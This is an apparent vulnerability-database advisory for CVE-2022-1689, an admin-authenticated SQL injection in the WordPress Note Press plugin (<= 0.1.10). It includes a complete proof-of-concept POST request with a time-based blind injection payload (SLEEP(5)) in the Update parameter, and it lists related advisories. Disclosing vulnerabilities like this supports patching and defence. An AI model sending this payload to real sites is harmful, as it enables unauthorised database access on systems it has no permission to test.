Lucene search
Daniel KrohmerWPEX-ID:982F84A1-216D-41ED-87BD-433B695CEC28HistoryMay 09, 2022 - 12:00 a.m.
Note Press <= 0.1.10 - Admin+ SQLi via Update
2022-05-0900:00:00
Daniel Krohmer
70
0.001 Low
EPSS
Percentile
21.8%
The plugin does not sanitise and escape the Update parameter before using it in a SQL statement when updating a note via the admin dashboard, leading to an SQL injection
POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
_wpnonce=f5b4b02f56&Title=Test&stickycolor=&Deadline=&Priority=0&iconselect%5B%5D=aablank.png&display_name=admin&Note_Presseditor=&Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)Related
wpvulndb
wpvulndb
Note Press <= 0.1.10 - Admin+ SQLi via Update
2022-05-09 00:00:00
cve
cve
CVE-2022-1689
2022-06-08 10:15:10
cnvd
cnvd
WordPress Note Press plugin SQL injection vulnerability (CNVD-2022-64665)
2022-06-13 00:00:00
prion
prion
Sql injection
2022-06-08 10:15:00
nvd
nvd
CVE-2022-1689
2022-06-08 10:15:10
cvelist
cvelist
CVE-2022-1689 Note Press <= 0.1.10 - Admin+ SQLi via Update
2022-06-06 08:51:24
patchstack
patchstack